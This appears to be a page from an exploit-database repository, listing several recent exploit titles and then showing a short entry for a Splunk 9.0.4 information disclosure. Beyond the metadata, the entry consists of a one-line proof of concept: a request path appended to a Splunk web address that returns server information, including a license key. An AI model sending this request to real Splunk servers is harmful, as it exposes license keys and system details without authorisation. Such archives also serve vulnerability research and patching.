5c0c152cec
6 changes to exploits/shellcodes/ghdb VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) - Remote Denial Of Service Splunk 9.0.4 - Information Disclosure Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure
14 lines
No EOL
511 B
Text
14 lines
No EOL
511 B
Text
# Exploit Title: Splunk 9.0.4 - Information Disclosure
|
|
# Date: 2023-09-18
|
|
# Exploit Author: Parsa rezaie khiabanloo
|
|
# Vendor Homepage: https://www.splunk.com/
|
|
# Version: 9.0.4
|
|
# Tested on: Windows OS
|
|
|
|
# Splunk through 9.0.4 allows information disclosure by appending
|
|
# /__raw/services/server/info/server-info?output_mode=json to a query,
|
|
# as demonstrated by discovering a license key and other information.
|
|
|
|
# PoC :
|
|
|
|
https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json |